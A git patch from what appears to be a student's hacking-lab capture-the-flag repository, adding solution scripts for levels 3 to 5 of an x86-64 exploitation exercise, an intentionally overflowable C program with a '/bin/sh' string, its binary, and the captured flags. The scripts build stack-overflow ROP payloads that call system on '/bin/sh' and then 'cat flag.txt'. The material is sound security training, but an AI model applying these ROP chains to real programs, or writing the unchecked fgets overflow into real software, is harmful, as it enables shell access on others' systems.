From c823836626a1917e6a248859b0900fc032131f51 Mon Sep 17 00:00:00 2001
From: Eggert Jung <eggert.s.jung@wischhof13.de>
Date: Tue, 6 Jan 2026 10:49:56 +0100
Subject: [PATCH] 5

---
 4/level3/test.sh   |   8 ++++++++
 4/level4/test.sh   |   9 +++++++++
 4/level5/flag.txt  |   1 +
 4/level5/input.txt | Bin 0 -> 78 bytes
 4/level5/level5    | Bin 0 -> 16912 bytes
 4/level5/level5.c  |  17 +++++++++++++++++
 4/level5/test.sh   |  15 +++++++++++++++
 7 files changed, 50 insertions(+)
 create mode 100755 4/level3/test.sh
 create mode 100755 4/level4/test.sh
 create mode 100644 4/level5/flag.txt
 create mode 100644 4/level5/input.txt
 create mode 100755 4/level5/level5
 create mode 100644 4/level5/level5.c
 create mode 100755 4/level5/test.sh

diff --git a/4/level3/test.sh b/4/level3/test.sh
new file mode 100755
index 0000000..22c46e4
--- /dev/null
+++ b/4/level3/test.sh
@@ -0,0 +1,8 @@
+OLDFLAG="hacklab{w3lc0m3_t0_x86_64_explo1t4t1on_I0vGIviy}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"
+GADGET1="\xc3\x12\x40\00\00\00\00\00"
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
diff --git a/4/level4/test.sh b/4/level4/test.sh
new file mode 100755
index 0000000..dc11693
--- /dev/null
+++ b/4/level4/test.sh
@@ -0,0 +1,9 @@
+OLDFLAG="hacklab{n3w_c4ll1ng_c0nv3nt1ons!_wYLVjeJr}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\xa4\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\xa3\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
diff --git a/4/level5/flag.txt b/4/level5/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level5/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level5/input.txt b/4/level5/input.txt
new file mode 100644
index 0000000000000000000000000000000000000000..7779602ba0c94b65fde87d512ef0e924ba3732f7
GIT binary patch
literal 78
tcmYdH#1AIi`~UxcJp)6tkOKn<csM|40Vtm<Ik7|`EhjNuucV@c3jiw~7oGqB

literal 0
HcmV?d00001

diff --git a/4/level5/level5 b/4/level5/level5
new file mode 100755
index 0000000000000000000000000000000000000000..069e0cde682dbf4a13c9a6afe8a9415b356b2306
GIT binary patch
literal 16912
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

literal 0
HcmV?d00001

diff --git a/4/level5/level5.c b/4/level5/level5.c
new file mode 100644
index 0000000..e9270d2
--- /dev/null
+++ b/4/level5/level5.c
@@ -0,0 +1,17 @@
+// gcc -o level5 -no-pie -fno-stack-protector level5.c
+#include <stdio.h>
+#include <stdlib.h>
+
+char command[] = "/bin/sh";
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  system("echo Bye.");
+  return 0;
+}
diff --git a/4/level5/test.sh b/4/level5/test.sh
new file mode 100755
index 0000000..2b1e0fd
--- /dev/null
+++ b/4/level5/test.sh
@@ -0,0 +1,15 @@
+#ROP
+#0x0000000000401283 : pop rdi ; ret
+
+#objdump
+#0000000000404048 g     O .data	0000000000000008              command
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\x10\x12\x40\00\00\00\00\00"
+
+printf "$OLDFLAG$PADDING$SAVERBP$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n"